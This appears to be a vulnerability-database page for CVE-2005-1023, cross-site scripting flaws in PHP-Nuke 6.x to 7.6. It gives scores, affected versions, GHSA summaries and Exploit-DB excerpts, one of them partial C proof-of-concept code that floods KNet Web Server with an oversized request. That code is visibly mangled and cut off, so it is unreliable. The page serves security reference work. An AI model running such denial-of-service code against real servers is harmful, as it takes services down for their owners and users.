CVE-2005-1023
published 2005-05-02CVE-2005-1023: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x to 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) min…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.73%
74.7th percentile
Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x to 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) min parameter to the Search module, (2) the categories parameter to the FAQ module, or (3) the ltr parameter to the Encyclopedia module. NOTE: the bid parameter issue in banners.php is already an item in CVE-2005-1000.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-355j-f2rj-3mv5: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2005-1023 [MEDIUM] GHSA-355j-f2rj-3mv5: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6
Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x to 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) min parameter to the Search module, (2) the categories parameter to the FAQ module, or (3) the ltr parameter to the Encyclopedia module. NOTE: the bid parameter issue in banners.php is already an item in CVE-2005-1000.
GHSA
GHSA-g43w-c8rf-68ph: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6
ghsa_unreviewed·2022-04-29·CVSS 4.3
CVE-2004-2293 [MEDIUM] GHSA-g43w-c8rf-68ph: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6
Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.0 to 7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) eid parameter or (2) query parameter to the Encyclopedia module, (3) preview_review function in the Reviews module as demonstrated by the url, cover, rlanguage, and hits parameters, or (4) savecomment function in the Reviews module, as demonstrated using the uname parameter. NOTE: the Faq/categories and Encyclopedia/ltr issues are already covered by CVE-2005-1023.
No detection rules found.
Exploit-DB
KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
exploitdb·2005-02-25
CVE-2005-0575 KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
---
/*
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ Knet
*/
#include
#include
#include
#include
#include
#include
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,90,1023);
printf("[Done]\nSending evil request \t...");
sprintf(request,"GET %s \n\r\n\r",evilbuf);
send(sockfd,request,strlen(request),0);
printf("[Done]\n\n
Exploit-DB
PHP-Nuke 6.x/7.x FAQ Module - 'categories' Cross-Site Scripting
exploitdb·2004-06-11
CVE-2005-1023 PHP-Nuke 6.x/7.x FAQ Module - 'categories' Cross-Site Scripting
PHP-Nuke 6.x/7.x FAQ Module - 'categories' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/10524/info
PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
PHP-Nuke is prone to multiple cross-site scripting vulnerabilities. These issues affect the 'Faq', 'Encyclopedia' and 'Reviews' modules.
These cross-site scripting issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer.
PHP-Nuke is prone to an SQL Injection Vulnerability. Again the issue is due to a failure of the applic
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111263454308478&w=2http://www.securityreason.com/adv/PHPNuke%206.x-7.6-p1.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/19952http://marc.info/?l=bugtraq&m=111263454308478&w=2http://www.securityreason.com/adv/PHPNuke%206.x-7.6-p1.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/19952
2005-05-02
Published